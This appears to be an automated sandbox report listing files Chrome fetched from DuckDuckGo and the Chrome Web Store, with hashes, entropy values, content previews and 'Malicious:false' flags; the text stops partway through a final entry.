                                                                                                                                                            Preview:"use strict";this.default_ChromeWebStoreConsumerFeUi=this.default_ChromeWebStoreConsumerFeUi||{};(function(_){var window=this;.try{._.p("db7dHd");.var j5=function(a){_.oC.call(this,a.Ha)};_.F(j5,_.oC);j5.Ea=_.oC.Ea;j5.prototype.Df=function(){return"db7dHd"};j5.prototype.yf=function(){return!0};j5.prototype.Ff=function(){return _.h5};_.mC(_.KG,j5);_.bB.db7dHd=_.OG;.._.q();.}catch(e){_._DumpException(e)}.}).call(this,this.default_ChromeWebStoreConsumerFeUi);.// Google Inc..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (27593), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):27593
                                                                                                                                                            Entropy (8bit):5.223911365632464
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:8ozu5x1m9NDf/i8XdOory0fCtOTZNoOc4VJ6C1JGHPrOReNhmBW:3u/eViww+ywToWVJ6CXpW
                                                                                                                                                            MD5:D5E75250B712FFCEE9696E9165BDA48B
                                                                                                                                                            SHA1:B0E2EAA888E672D17A8BE01BA19CCCA0BE4BF8E0
                                                                                                                                                            SHA-256:91F423471D13239124F4BCE98FAE216276C368FAE466DB3040E061999EEF2113
                                                                                                                                                            SHA-512:C091EB620C1FB302006C8265CE4C6800FCFF768EDD243BCE0EFC064F6DEB499E8D1D411D3131E9A9A4A6CD837BDC0AD2FB1829A3094F81B3A0EFC100C1B21584
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/81125-b74d1b6f4908497b.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[81125],{61760:function(n,e,t){"use strict";t.d(e,{cZ:function(){return Re},t9:function(){return Me}});var r=t(67294),o=t(14921),u=t(55152),a=t(69695),i=t(40884),c=t(61331),d=t(24683),l=t(63366),s=t(87462),f="data-focus-lock",v="data-focus-lock-disabled";function p(n,e){return function(n,e){var t=(0,r.useState)((function(){return{value:n,callback:e,facade:{get current(){return t.value},set current(n){var e=t.value;e!==n&&(t.value=n,t.callback(n,e))}}}}))[0];return t.callback=e,t.facade}(e||null,(function(e){return n.forEach((function(n){return function(n,e){return"function"===typeof n?n(e):n&&(n.current=e),n}(n,e)}))}))}var m={width:"1px",height:"0px",padding:0,overflow:"hidden",position:"fixed",top:"1px",left:"1px"},h=function(n){var e=n.children;return r.createElement(r.Fragment,null,r.createElement("div",{key:"guard-first","data-focus-guard":!0,"data-focus-auto-guard":!0,style:m}),e,e&&r.createElement("div",{key:"guard-last","d
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 375 x 940, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):127123
                                                                                                                                                            Entropy (8bit):7.976995440982271
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:DEJfM5fHnKwqp7a6ErkkQ4jGjlXtrgXVFUAOitJ:I9M5vnSp7aThhGl6XTUAD
                                                                                                                                                            MD5:693FD6CF691840728E9B69E2484719E4
                                                                                                                                                            SHA1:F5D72EFE1690BFD403D69FE8B0FBF2D5AE7EDEDC
                                                                                                                                                            SHA-256:7379BF8B463F46AB8D925E78A0F08CE806CAF487FA468F687DDA1D2A071D65ED
                                                                                                                                                            SHA-512:166E407A965C7856703C4FEC2459D77079357DAEB20A021B6C61938F246A6F8C0DB5E55543566E53A90D112F7C0BA79E0B2F8FF315323D15202290A274D8DF2E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...w..........x......PLTE..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................+.....tRNS.........":VG...8... .3B..}$zL0N*...@.ZYeQ..hjU.,lv^)s^pI.'J3M= :\T.oct(t.x5crX%/.IDa1.q6'L.nz.R%*Bj?s.}`<.g.5~d\.y..L>0DD571J<~Ojf{r\MQukaqS|^anwOvOS.Z=vlnx8AQ.WGfmEp,SYHfIO{,xl_{fDc;Z`3W>\3hQWi=`Wc.n#+qFkZ?9wFT6C "G...dAn.4g....IDATx.....0.CK..@..g.I..0;s..B.8...QLw?..J.5...U
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 375 x 940, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):127123
                                                                                                                                                            Entropy (8bit):7.976995440982271
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:DEJfM5fHnKwqp7a6ErkkQ4jGjlXtrgXVFUAOitJ:I9M5vnSp7aThhGl6XTUAD
                                                                                                                                                            MD5:693FD6CF691840728E9B69E2484719E4
                                                                                                                                                            SHA1:F5D72EFE1690BFD403D69FE8B0FBF2D5AE7EDEDC
                                                                                                                                                            SHA-256:7379BF8B463F46AB8D925E78A0F08CE806CAF487FA468F687DDA1D2A071D65ED
                                                                                                                                                            SHA-512:166E407A965C7856703C4FEC2459D77079357DAEB20A021B6C61938F246A6F8C0DB5E55543566E53A90D112F7C0BA79E0B2F8FF315323D15202290A274D8DF2E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/homepage-btf-mobile-light.png
                                                                                                                                                            Preview:.PNG........IHDR...w..........x......PLTE..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................+.....tRNS.........":VG...8... .3B..}$zL0N*...@.ZYeQ..hjU.,lv^)s^pI.'J3M= :\T.oct(t.x5crX%/.IDa1.q6'L.nz.R%*Bj?s.}`<.g.5~d\.y..L>0DD571J<~Ojf{r\MQukaqS|^anwOvOS.Z=vlnx8AQ.WGfmEp,SYHfIO{,xl_{fDc;Z`3W>\3hQWi=`Wc.n#+qFkZ?9wFT6C "G...dAn.4g....IDATx.....0.CK..@..g.I..0;s..B.8...QLw?..J.5...U
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (10992), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):10992
                                                                                                                                                            Entropy (8bit):5.175045287426147
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:oZR1lcPbxCpvdeKb3z5p5/gpdW8Ovl5HCB3NzAEwBitJZC1N:w0FC6o3t7b8Ot5HCBR96UON
                                                                                                                                                            MD5:4EEE8498FD1474D6BD65C517C326EB7A
                                                                                                                                                            SHA1:59132BBABB115FFCE50E42AE046103BD0B632D56
                                                                                                                                                            SHA-256:CCCEDF809052A4EE24F898E5971D2EB2C5D8353FC33D57A3713AE909A617128B
                                                                                                                                                            SHA-512:6ED007658088F6845349BC83737243A7DF21E081C9FBBC2E10074B0EAEBD5D527983CCD634A6A132E6153A081D07DD9FB2BCC1FE3157FE5463E7072592B43BC5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/43965-635afa8829c6b3d7.js
                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[43965],{14921:function(t,n,e){e.d(n,{h:function(){return a}});var r=e(67294),o=e(96637),i=e(12459),s=e(73935),a=function(t){var n=t.children,e=t.type,a=void 0===e?"reach-portal":e,u=t.containerRef,c=(0,r.useRef)(null),l=(0,r.useRef)(null),p=(0,i.N)();return(0,o.L)((function(){if(c.current){var t=c.current.ownerDocument,n=(null==u?void 0:u.current)||t.body;return l.current=null==t?void 0:t.createElement(a),n.appendChild(l.current),p(),function(){l.current&&n&&n.removeChild(l.current)}}}),[a,p,u]),l.current?(0,s.createPortal)(n,l.current):(0,r.createElement)("span",{ref:c})};n.Z=a},12769:function(t,n,e){function r(){return!("undefined"===typeof window||!window.document||!window.document.createElement)}e.d(n,{N:function(){return r}})},24683:function(t,n,e){function r(t,n){return function(e){if(t&&t(e),!e.defaultPrevented)return n(e)}}e.d(n,{M:function(){return r}})},61331:function(t,n,e){e.d(n,{e:function(){return u}});
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):86992
                                                                                                                                                            Entropy (8bit):5.781602409270405
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:jac8Ic12140AwTjE4ynTX20IcKIcaUTWw:+c8muwTjE4yTF8w0r
                                                                                                                                                            MD5:E235E9D34C284C850974AA7D7B7C83CB
                                                                                                                                                            SHA1:04CA1B6A715A50D834CB6012F72FE844CCA3E026
                                                                                                                                                            SHA-256:30D14F0AF77DA8D1C94E61C6FEE145CCE1EA958F4CA5C663EE99742CFC3B6699
                                                                                                                                                            SHA-512:B546CCEB2AEDAED9DFEF607460747A3EE64CCA677CE1C292C9373A5AF435A08D2533D7F03E21B70A61365AE75C5CD4DAE60D2B7D6E25B1580C87E2FBBA3685F3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/windows?origin=funnel_home___details
                                                                                                                                                            Preview:<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=1 , viewport-fit=auto"/><title>Download DuckDuckGo for Windows</title><meta name="description" content="The &quot;easy button&quot; for privacy, now on desktop"/><meta name="twitter:card" content="summary_large_image"/><meta name="twitter:site" content="@duckduckgo"/><meta name="twitter:title" content="Download DuckDuckGo for Windows"/><meta name="twitter:description" content="The &quot;easy button&quot; for privacy, now on desktop"/><meta name="twitter:image" content="https://duckduckgo.com/static-assets/image/windows/screenshot-light.png"/><meta property="og:url" content="https://duckduckgo.com/windows"/><meta property="og:type" content="website"/><meta property="og:site_name" content="DuckDuckGo"/><meta property="og:title" content="Download DuckDuckGo for Windows"/><meta property="og:description" content="The &quot;easy button&quot; for pri
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (46701), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):46701
                                                                                                                                                            Entropy (8bit):5.024354612087859
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:Rz60OcZTXuD6QHoBx4+OTzYbO3H0ob10JbI6Hfo5u4Wbfj5oqyZ2qpVWpNBEi6c+:s0OcVuD6QIjNOkoWbfaThpVWSt
                                                                                                                                                            MD5:39AC31CEBBB0129A1D073E9159F9DFF4
                                                                                                                                                            SHA1:279150D664281422F013FC6A9A43F3C9316A6CAA
                                                                                                                                                            SHA-256:34FE8D87143834FF4098042DE0DC3C219A15BCE0F45A7C0D559A95924BE9281E
                                                                                                                                                            SHA-512:AB97C70DD9FAF17ACC133B2E802F961B31884A126579C7E362D6D1434BB275A0D245DA8D28DAF3B00D6DC2CAF2F48A2C973AF612C099DB323CB39F3DBC913BA7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/css/681db936aa729d59.css
                                                                                                                                                            Preview:@font-face{font-family:Proxima Nova;src:url(/static-assets/font/ProximaNova-ExtraBold-webfont.woff2) format("woff2"),url(/static-assets/font/ProximaNova-ExtraBold-webfont.woff) format("woff"),url(/static-assets/font/ProximaNova-ExtraBold-webfont.ttf) format("truetype");font-weight:800;font-style:normal;font-kerning:normal;text-rendering:optimizeLegibility;font-display:swap}@font-face{font-family:Proxima Nova;src:url(/static-assets/font/ProximaNova-Bold-webfont.woff2) format("woff2"),url(/static-assets/font/ProximaNova-Bold-webfont.woff) format("woff"),url(/static-assets/font/ProximaNova-Bold-webfont.ttf) format("truetype");font-weight:700;font-style:normal;font-kerning:normal;text-rendering:optimizeLegibility;font-display:swap}@font-face{font-family:Proxima Nova;src:url(/static-assets/font/ProximaNova-Sbold-webfont.woff2) format("woff2"),url(/static-assets/font/ProximaNova-Sbold-webfont.woff) format("woff"),url(/static-assets/font/ProximaNova-Sbold-webfont.ttf) format("truetype");font-
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):30094
                                                                                                                                                            Entropy (8bit):5.013087665369252
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:uyRugOK9TnMtqGKhJzQ6M58RXE9Ly9PkR2TdhiQ7Ytu5oKp:bRugOK9TMtrEdc2VL5Np
                                                                                                                                                            MD5:EF7D69259373A96A9865F6F88652B425
                                                                                                                                                            SHA1:CC2A8D995AB6A1D0AF4AEB507A68484AFA625C4D
                                                                                                                                                            SHA-256:4B5986A20FFABD94AEAD03BBAF736EB7818999282E119A7B760C417D392C7CDD
                                                                                                                                                            SHA-512:2438FF2AA995C3CCBD89245585C062DAE22B0226D4D79790246C11104B83FF3CA0762210156406DE441726CD3F4F05C4604494B9CBEABF210DCAEF8193B1CEC4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:{"pageProps":{"bootstrapTheme":false,"translations":{"locale":"en-US","messages":{"QTW1uT":[{"type":0,"value":"Add to "},{"type":1,"value":"browserName"}],"bDg6ew":[{"type":0,"value":"Got it"}],"KtTyL5":[{"type":0,"value":"Download DuckDuckGo Browser"}],"HDlAOk":[{"type":0,"value":"Add our free extension to block web trackers."}],"Vv1JV8":[{"type":0,"value":"Get our free browser for even more privacy."}],"X0KnmR":[{"type":0,"value":"Make DuckDuckGo your default search engine."}],"JxLz7W":[{"type":0,"value":"As per our privacy policy, we do not collect or share any personal information ourselves. All of this privacy protection happens on your device."}],"R2RXjF":[{"type":0,"value":"These browser permissions are used to add privacy protection on websites you visit by blocking hidden trackers, encrypting connections where possible, and by making DuckDuckGo your default search engine."}],"mcsUF6":[{"type":0,"value":"Free. Fast. Private. Get the DuckDuckGo browser for "},{"type":1,"value":"
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1885)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):82296
                                                                                                                                                            Entropy (8bit):5.592663724925133
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:brcg844kyv9f9wzJz6uKBLpLON1B5q0VOrGzIF7:AkyvFpLOHqmO2E7
                                                                                                                                                            MD5:E08FA1D1755C4F8570B123C010325195
                                                                                                                                                            SHA1:C496DDD8CBC293564E5FDF2D987833332F554660
                                                                                                                                                            SHA-256:73C96E90B9C6A8E44AA7FA57F5A84A765AB2D1452E11B7B41882F2056B4BC393
                                                                                                                                                            SHA-512:369B54AB94A768D44216962936D3DD948EAA688488D9C279FFCEEC2A2CBD4243FEFB2EADABB6C9D53243C3803EFBB5DC7E234CFC17EC5A9CA549AD4DE4141700
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 42392, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):42392
                                                                                                                                                            Entropy (8bit):7.994509370564832
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:Zt2yUGekovibq8kQ2NwDvOaee4uMZ9yQpDCvR8eWS6N:yGfovAkRNwrOBvZw0yLN6N
                                                                                                                                                            MD5:398E125F54E0D48E16CA0809FBFAF1CB
                                                                                                                                                            SHA1:73AC6E1000BFAF013B5C5E3B1BB717142ED21E45
                                                                                                                                                            SHA-256:FED15393DBD651CC99CA78F5B0A39A721F143AA61C5EBECEC69E520B3A48507F
                                                                                                                                                            SHA-512:CEF6AC7A845D4D4878998C242D9D5EF7259DCBD5EC6D42131B1C7D6519E485B5570E25E36DFBA8466F05F596C2609A815F803E2E26ECD6420CE392357A6E368E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/font/ProximaNova-Bold-webfont.woff2
                                                                                                                                                            Preview:wOF2...................*...........................?FFTM..f.....D.`..&..F........`..B..`..6.$..<. ........a[..q..w...z...?.X.6....Ff..=..W......C5}....v..C.?.}..(.v[.:......Q34p.J..2ed...(...d.,.p....JUS.s.Sv..c..;..E.;\-)).i".Rk[..oL&]1.:...U6..w.....N.O..4.>..+.'...lXZZ.|..~ts.5U).E..@.....v...n.m8.Q..E:.%.m...6.].p.^.j.jo2N........z..(...HVN.$_.y..o.S................q..n..... ....G.].5j......\.....9.&69*.D...6.In06.....1.FI.b..z...o.....X\.[..f......!....o.....?...u!...oS..?...\Y.eG..82..q.. .i..;-...:."....PZ..r....m...%.},.c[...uA...=S.c..2.J...H%...:....O......$>.hj........)..$5...[.T.....I7...4....2..,.S.%.D.N$....l..^.\$....S.W..._.".a..eK...UM.$E...R:.wc.e._.l..T.f.Z!...l...9.5.k5.0.!.Y.&!.....6.Al........<..Py`..g..r..v8.L[~...o.=..m..b~...$...._2....._g.Z;.p.D4.(..;..O..-....7A.&.......M.~...JX..L.o7@...S.>.4A..vQ....0..-n.X...(3i.!k......F......H..Cl.$..,c...|Pr}E.Q.[....(..g....=1.6......<.m.yX..R...W=.J..M.....N{0..hI.._
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 275 x 175, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):55560
                                                                                                                                                            Entropy (8bit):7.987579207959292
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:r2FMEltvMXKjC9oTrt03pzCWiiokZO25/UtDdk47+8GTCw0si9r2RpiJ9PNov7SC:gdTntyCWi2vUuJTEani7lNFThbM3
                                                                                                                                                            MD5:A6F8B9EB68AF4A69E6EC1EC00ABD1170
                                                                                                                                                            SHA1:0A715776F24138984556A53D02B21918A5DBD945
                                                                                                                                                            SHA-256:FB46B4874F8767D203E18D2ED33FF6F6E31F1F238C8B1662EA8E1648F4CCBD37
                                                                                                                                                            SHA-512:CA204D37B8E994C6CA531F8B15B965B3574AE602ABA954181E0462084B8471DB55F8D5F3FD69741A9D37B1302A88C1E3D3F2C00782093E0A3D6A647BFBB77E79
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/Q6vggBG9PtDuGi_WuhHJu0lMF-SsiKNAmGc73-4xvA8ZtYDSyPlCmr--wlH-EVPky1fIxzCn0zob7zurBaAgZZubxA0=s275-w275-h175
                                                                                                                                                            Preview:.PNG........IHDR.............Q..U....sBIT.....O... .IDATx...w.].q'Z..{....... ........L..eR2I..h...~...s|...{.g[.{..~^9....+..LJL..%. .. rN......G..;..9.!...{Bwu.~U]...w.....D...........O...H...[ ............HO .$$(.V............IO$i......4i.jk........G@... ..".........X....q......C..>.@..D.......H....dP...DGD.g..8...#.C......n...f..p.Ig..?....=\..E...z.....-.@....T..<q{x.ME.T.0n.'....C.....D>.oK......<y.mVu.6.`.>I.1...A!...B....s.y..(..@<.Q.Y..:....Z......:e..=..DM.0"K.C.OED......K./..HH&J.B.S/...#=B/.E.....h.QE.*uj.#?........g..{V}..b.h... .po...j.^......@So"w!Uji.""[..M....z......U.e.h..Jl..D.....0....zE....y.-..!...S....T.......yv..V$"...2Q......W....$b.@.m.%.|{.6.P..3Q..<......."...^......#...@......$i.^....3..p...".. S....>!...."..#..W.W24*t...c.&n.c-.@..3*U%..G..T..K...H.L..!....^...h.0..qbIp........ ...2.@.7..{P..J..H..;4.ab../nC.a.. ..b..6....[.....0....^H;.[.........D...*a.<...>B..x`Uq.<..P...>......-9L.~Z.L...l.MuP...#...\4....7Jc.W..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):5370
                                                                                                                                                            Entropy (8bit):7.954575376994359
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:96SkxbA+yBZIWJM3EmjRPEs+P8gZ9ItsVFxM3kiqnCj3LAMD5q+g7I:z09WSPEsc6tYFxniaCjbAMD5qR8
                                                                                                                                                            MD5:06631856C665206AC223C5E99E047B7F
                                                                                                                                                            SHA1:88AD0A3EF439D3A7AAECC65AB9A48CACD500A5A5
                                                                                                                                                            SHA-256:DB2D9BAD7CE3345694A33F06F1034870FB4385A2E8881DFEF0B8F5921C9BF9D5
                                                                                                                                                            SHA-512:2F7E5EE23346570A05F22BED6F3F6127956253164F371B6FBD16E2894EBBD09E238464EAF7C9869DF370C16466B953F43DEC55E6388C1836700E3A54372BCF6E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/cw6loShVaHB1WmJV3GTr3AWscNoZeSvxksONwnp8n7AKazCv1k-rcjWEp2Dta7VyElFGR7BzspOehuSZkklLCd66=s60
                                                                                                                                                            Preview:.PNG........IHDR...<...<.....:..r....sBIT....|.d.....bKGD.......C......IDATh...y.]U..?...M5.."...;1@.!....j7.F.D......Z.[...~....?......BK. ...!B....!!dNUjx.......R..X/.^...}g.......9W.>9.8.X.....:..GI.....j...w..........I...|...........w...V.Y*.q.}.........6K..'.o..,[..zY...<.|...^...u...>....8|...,<~.,..>*.B.2@.....|.^..Cm..4.cP.+.I.F.0........'...n.e.....D&....+.U..U.y.}.Y._A9...M.....q."....g..X..1G=.x.P.f3D..w.*G....+.....>..yG..&2..H.....'..O<.^4....e..7....KXw..|...p..Q..9.....<....f-.z?f~..B."..........n3..U......K'......*....n..<f...s./>.....6$h..|....c^....\.T.ru.W..O..X..=..uY.qZ..'.b..nL...^.9..|.s._......U..+.'.v....../.[.O..g.......W...X......,..7.MM...I.ED.)`.<.....EV.1.....M..W.qp<.......L.,3.u.].(.n.O.H.A..q..">.X.?...i...K..+.[.W.7\.!dfv.....|T.BK....FDq.oep.p..].7?O.'..p.."&..4!........y..f."0.^5.<.>.XG...yO....k....K4.O.+>...yT.u ...V....7......[..A)..A:.D.8......J....,...)'.L...D.l.`.v..S....@s..7..M.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (2126)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):22201
                                                                                                                                                            Entropy (8bit):5.399602162852085
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:CydL417JU18FUYJZ9TFrf3Lm0ox1br98bHB46Sz2TamqVqqowqm4wz7lS:CydL4s8FUYJZ9TFrf3Lm0ox1br6MyTbZ
                                                                                                                                                            MD5:C0700EDC59E822EA7EEFA100A6CC268A
                                                                                                                                                            SHA1:2159BBBBF7F82D06E9FD473F6542E744D65295F5
                                                                                                                                                            SHA-256:5DA8D0119CB38806C40EC21CDE578C0E87717062FCB3858BC67CE69513484B62
                                                                                                                                                            SHA-512:75C9E857014CC225828A709C412D371A7798309575B16BE3C368F57107C73340ECE9BD608434632DEA97E4774627F519C1093E0CB40743658A86B13D8D2ED4A0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-chrome-webstore/_/js/k=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.en_US.yIPKtUt8CNQ.es5.O/ck=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.GtGb1vgdaaY.L.B1.O/am=SAcGA2YB/d=1/exm=A1yn5d,A7fCU,AWpPDd,BBI74,BVgquf,CfLNpd,DNlSjf,ECBKud,EEDORb,EFQ78c,FdMhB,Fu7Bjd,HsQQib,IZT63,JNoxi,KUM7Z,KfQkxf,L1AAkb,LBaJxb,LEikZe,LcrBLd,M0x0ie,MH0hJe,MI6k7c,MT4Hub,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O626Fe,O6y8ed,OTA3Ae,OhgRI,OmgaI,PIVayb,PrPYRd,QIhFr,QVysJe,QvLWAb,R6rk4,RMhBfe,RiINWe,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,UkbOSe,Ulmmrd,V3dDOb,V9amgb,VBl5Ff,XVMNvd,Xi0ENb,YA1iG,YYmHzb,Z5uLle,ZDZcre,ZfAoz,ZvHseb,ZwDk9d,_b,_tp,aW3pY,aurFic,bZ0mod,byfTOb,cephkf,dsBBae,duFQFc,e5qFLc,ebZ3mb,fKUV3e,gIl2M,gychg,h4ilFc,hKSk3e,hc6Ubd,i8oNZb,kBpGk,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mUxuKd,mdR7q,n73qwf,o2G9me,ovKuLd,p8L0ob,pjICDe,pw70Gc,qv5bsb,ri2s0b,rm99Nc,s39S4,sI9bWe,sQ8PT,tw4SJc,w9C4d,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,zKiH5d,zbML3c,zr1jrb/excm=_b,_tp,itemdetailview/ed=1/wt=2/ujg=1/rs=AEP720Jfe38t-OWhOSrlVq2pOwWCRGJ40A/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:YA1iG;xqZiqf:BBI74;yEQyxe:p8L0ob;yxTchf:KUM7Z;zxnPse:duFQFc/m=RqjULd"
                                                                                                                                                            Preview:"use strict";this.default_ChromeWebStoreConsumerFeUi=this.default_ChromeWebStoreConsumerFeUi||{};(function(_){var window=this;.try{.var oia;._.qia=function(){var a=oia(_.Me("xwAfE"),function(){return _.Me("UUFaWc")}),b=oia(_.Me("xnI9P"),function(){return _.Me("u4g7r")}),c,d,e,f;return(f=pia)!=null?f:pia=Object.freeze({isEnabled:function(g){return g===-1||_.Af(_.Me("iCzhFc"),!1)?!1:a.enabled||b.enabled},environment:(c=_.mm(_.Me("y2FhP")))!=null?c:void 0,ZE:(d=_.mm(_.Me("MUE6Ne")))!=null?d:void 0,nj:(e=_.mm(_.Me("cfb2h")))!=null?e:void 0,Dh:_.pm(_.Me("yFnxrf"),-1),wF:_.sg(_.Me("fPDxwd")).map(function(g){return _.pm(g,0)}).filter(function(g){return g>0}),.uJ:a,wSa:b})};oia=function(a,b){a=_.Af(a,!1);return{enabled:a,HB:a?_.Pd(_.qm(b(),_.FI)):ria()}};_.FI=function(a){this.Ia=_.z(a)};_.F(_.FI,_.C);var ria=function(a){return function(){return _.nd(a)}}(_.FI);var pia;._.p("RqjULd");.var Xia=function(a){if(_.da&&_.da.performance&&_.da.performance.memory){var b=_.da.performance.memory;if(b){var
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 756 x 1450, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):64366
                                                                                                                                                            Entropy (8bit):7.974945120371936
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:uXaNSqgLN43VPoWm0VFefzPRo0FZvwp1j3kZQyuNsAYFFp:uE8i3dRV4rPXFZvYdUg0bp
                                                                                                                                                            MD5:C077F143524F375831D4CBAC25F35700
                                                                                                                                                            SHA1:8801E1092762D7AB91971A01079C5805DB3F2AD1
                                                                                                                                                            SHA-256:F74D30563CFFF0DF0766BE1414B7447ACBC0FC75C0B2193481D1BEB9B4CF98DA
